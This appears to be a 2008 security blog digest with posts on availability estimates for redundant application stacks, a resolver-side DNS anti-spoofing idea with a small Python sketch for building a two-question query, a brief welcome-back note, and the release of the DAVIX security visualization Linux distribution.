Note that if you believe in complexity and the human factor, you might argue that, because they are more complex, redundant systems have more failures. I'm sure this is true, but I haven't accounted for it in this post (yet). Note also that I consider SAN LUN failure to be the same as in the non-redundant case: I assume that LUNs are always configured with some form of redundancy, even in the 'non-redundant' scenario.

[image: redundant-application-stack-path]

Now apply it to a typical redundant application stack. The stack mixes active/active and active/passive pairs. There are differences in the failure rates of active/active and active/passive HA pairs, but for this post the difference is minor enough to ignore. (Half the time, when an active/passive pair has a failure, the passive device is the one that failed, so service is unaffected. Active/active pairs therefore have a service-affecting failure twice as often.)

Under normal operation, the green devices are active, and failure of any active device causes an application outage equal to the failover time of the high availability device pair.

The estimates for failure frequency and recovery time are:

Component        Failures per Year  Hours to Failover (MTTR)  Hours Failed per Year
WAN Link         0.5                0.05                      0.025
Router           0.2                0.05                      0.01
Firewall         0.2                0.05                      0.01
Load Balancers   0.2                0.05                      0.01
Switch           0.2                0.05                      0.01
Web Server       0.5                0.05                      0.025
Switch           0.2                0.05                      0.01
Database Server  0.5                0.05                      0.025
SAN Fabric       0.2                0.01                      0.002
SAN LUN          0.1                0.12                      0.12
Power/Cooling    1.0                0                         0
Total                                                         0.25 hours = 15 min

These numbers imply some assumptions about some of the components. For example, in this trivial case, I'm assuming that :

  • The WAN links must not be in the same conduit or terminate on the same device at the upstream ISP; otherwise they would not be considered redundant. Also, the WAN links will likely be active/active, so the probability of failure will double.
  • Networks, layer 3 versus layer 2: I'll go out on a limb here. In spite of what vendors promise, under most conditions layer 2 redundancy (i.e. spanning-tree-managed link redundancy) does not provide higher availability than a similarly designed network with layer 3 redundancy (routing protocols). My experience is that the phrase 'friends don't let friends run spanning tree' is true, and that the advantages gained by the link redundancy of layer 2 designs are outweighed by the increased probability of a spanning tree loop taking down the network.
  • Power failures are assumed to be covered by battery/generator, but many hosting facilities still have service-affecting power/cooling failures. If I were presenting these numbers to a client, I'd factor in power and cooling somehow, perhaps by guesstimating an hour or so per year, depending on the facility.

These numbers look pretty good, but don't start jumping up and down yet.

Humans are in the loop but are not accounted for in this calculation. As I indicated in the human factor, humans can, in the case where redundant systems are properly designed and deployed, be the largest cause of downtime (the keyboard-chair interface is non-redundant). Also, there is no consideration for the application itself (bugs, bad or failed deployments) or for the database (performance problems, bugs). As indicated in the previous post, a poorly designed application that is down every week because of performance issues or bugs isn't going to magically have fewer failures because it is moved to redundant systems. It will just be a poorly designed, redundant application.

Coupled Dependencies

 
[image: availability-failed]

A quick note on coupled dependencies. In the example above, the design is such that the load balancer, firewall and router are coupled. (In this design they are; in other designs they are not.) A hypothetical failure of the active firewall would result in a firewall failover, a load balancer failover, and perhaps a router HSRP failover. The MTTR would be the time it takes for all three devices to figure out which one is active.
 
Coupled dependencies tend to cause unexpected outages themselves. Typically, when designing systems with coupled dependencies, thorough testing is needed to uncover unexpected interactions between the coupled devices. (In the case shown here, the interaction between HSRP, the routing protocol, the active/passive firewall, and layer 2 redundancy at the switch layer is complex enough to be worth a day in the lab.)
 
 
 

Conclusions

  • Structured System Management has the greatest influence on availability.
  • With non-redundant but well managed systems, the human factor will be significant, but should not be the major cause of outages.
  • With redundant, well managed systems, the human factor may be the largest cause of outages.
  • A poorly designed or written application will not be improved by redundancy.
 
Keep in mind that the combination of application, human and database outages, not considered in the calculation, will far outweigh simple hardware and operating system failures. For your estimates, you will have to add failures and recovery time for human failure, application failure and database failure. (Hint: figure a couple of hours each per year.)
 
As indicated in the introductory post, I tried.
 
Back to the Introduction (or the previous post).

Using the DNS Question to Carry Randomness - a Temporary Hack? [Last In - First Out]

Posted: 14 Aug 2008 10:51 PM CDT

 

I read Mike Rothman's post Boiling the DNS Ocean. It led me to a thought (just a thought): somewhere within the existing DNS protocol there has to be a way of introducing more randomness into the DNS question and getting that randomness back in the answer, simply to increase the probability that a resolver can trust an authoritative response. Of course, having never written a resolver, I'm not qualified to analyze the problem -- but this being the blogosphere, that's no reason to quit posting.

So, at the risk of committing bloggo-suicide... here goes.

Plan 'A' was to figure out if the unused bits in the ancount, nscount or arcount of the question could be used to send more random bits to the authoritative DNS. The ADNS would have to return those bits somewhere, and not in the same fields, because in the answer those bits are already used. Perhaps in an additional RR? It sounds hard to implement, and it would require that both the ADNS and the resolver be upgraded. Try again.

Plan B is to use additional question records to send randomness from the resolver to the authoritative DNS, and figure out how to get them back.

Hmm... how about using NXDOMAIN to carry the bits back to the resolver?

If I am a resolver, then instead of asking one question (the one I want answered), I ask two: the one I want to know, and one that nobody knows the answer to, not even the authoritative DNS, like an A record made up of a long string of random bytes. Depending on the response, I can decide to trust or not trust the answer. Let's say that I need to know the A record for www.example.com. First I set qdcount=2, then in one request I ask example.com's NSs two questions:


Question 1: www.example.com
Question 2: longstringofrandombytes.example.com

If I get a valid response for the first question and an NXDOMAIN response for the second, I know that I've got a reply from a valid ADNS rather than a spoofed reply. An attacker spoofing the valid ADNS will not know the longstringofrandombytes part of the second question and cannot reasonably guess that string. The real ADNS will reply to the second question with either an NXDOMAIN error or a valid IP. If I get the NXDOMAIN error for the same longstringofrandombytes.example.com that I asked for, I'm good to go.

If the ADNS responds with a valid IP address or CNAME, I know that the DNS in question is doing NXDOMAIN rewriting or has a wildcard. I can trust and cache that answer, annoying though it may be. If I get neither an IP nor an NXDOMAIN, the response is suspect.

From what I can see (which isn't very far), Plan B could be implemented in a resolver without any change to the upstream authoritative DNS. The upstream would just see a bunch of requests that it would answer with NXDOMAIN; heck, it is probably already seeing tons of those, with all the exploit attempts that are likely flying around. The resolver would have to either track the longstringofrandombytes that it sent for each question, or use some sort of hash/cookie to validate the bytes without storing or caching them for the duration of the round trip.
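
To make Plan B slightly more concrete, here is a back-of-the-napkin Python sketch of what the two-question query would look like on the wire. This assumes the upstream server is willing to answer a query with qdcount=2 at all (many won't, which may well be the thing I'm missing), and the helper names are mine:

import os
import struct

def encode_qname(name):
    # DNS names are length-prefixed labels ending in a zero byte
    parts = name.rstrip('.').split('.')
    return b''.join(bytes([len(p)]) + p.encode('ascii') for p in parts) + b'\x00'

def two_question_query(wanted, zone):
    nonce = os.urandom(16).hex()  # 32 hex chars, safely under the 63-byte label limit
    txid = os.urandom(2)          # random transaction ID, as usual
    header = txid + struct.pack('>HHHHH',
                                0x0100,  # flags: standard query, recursion desired
                                2,       # qdcount = 2: the real question plus the canary
                                0, 0, 0)
    qtail = struct.pack('>HH', 1, 1)     # QTYPE=A, QCLASS=IN
    packet = (header
              + encode_qname(wanted) + qtail
              + encode_qname(nonce + '.' + zone) + qtail)
    return packet, nonce

# pkt, nonce = two_question_query('www.example.com', 'example.com')
# Send pkt over UDP to the zone's ADNS, then accept the answer only if the
# reply echoes both questions and reports NXDOMAIN (rcode 3) for the nonce name.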

This is definitely an ugly hack, and I'm not even sure it would work. It wouldn't make sense to use it for stub resolvers, it doesn't help against man-in-the-middle attacks, and ADNSs would see increased load. But there is no shared secret to manage as in TSIG, it doesn't require a top-down deployment like DNSSEC, there is no protocol-layer change (as far as I can figure out), and no coordinated worldwide deployment is needed. Each operator can update one resolver at a time.
 
So am I smoking too much weed? Probably... my guess is that there is something I'm missing.

A bit of searching uncovered a similar concept being discussed at the IETF.

OK, I'm not the first one to dream this up. There is a difference, though: that proposal seems to have died, and from what I can tell it would require both ends of the transaction to be aware of the 'new plan'. That requirement makes it too hard to implement as a short-term solution.

Obviously the topic of short- and long-term fixes for the DNS issue is already being discussed in circles where discussions like this actually matter. The problem is finding a solution that can be implemented on a wide scale, and per Vixie's summary of the conversation in the above link:

a solution here would be opportunistic and pairwise deployable, requiring
no flag days; it would require no new technical expertise for end users; it
would have only graceful failure modes; it would not be subject to downgrade
attacks; and ideally, it would require no new protocol development work.



The 'pairwise deployable' part is still a problem. There are an awful lot of nameservers out there.



--Mike

Welcome back to My Friend, Alan Shimel [An Information Security Place]

Posted: 14 Aug 2008 09:57 PM CDT

I have two things to say:

1. Welcome back to the blogosphere, Alan. Great to have you back.

2. You people who screwed with him are filthy bastard racist cowards.

Vet

DAVIX 1.0.1 Officially Launched [iplosion security]

Posted: 14 Aug 2008 05:39 PM CDT

After months of building and testing, the long-anticipated release of DAVIX - The Data Analysis & Visualization Linux® - arrived last week during Blackhat/DEFCON in Las Vegas. It is a very exciting moment for me, and I am curious to see how the product is received by the audience. So far the ISO image has been downloaded at least 600 times from our main distribution server; downloads from the mirrors are not counted.

Additionally, Raffael Marty's book Applied Security Visualization is now available in print. DAVIX was built with this particular book in mind. If you are looking for a methodology and not just a workable tool set, then the book is what you are looking for. It covers all the steps from the very basics to complete case studies and contains many hands-on examples. The book together with DAVIX 1.0.1 is therefore the perfect match for getting started with security visualization. For a preview of the book's content, check out the Rough Cuts version.

All those eager to get their hands dirty immediately can find a description as well as the download links for the DAVIX ISO image on the DAVIX homepage. I wish you happy visualizing!
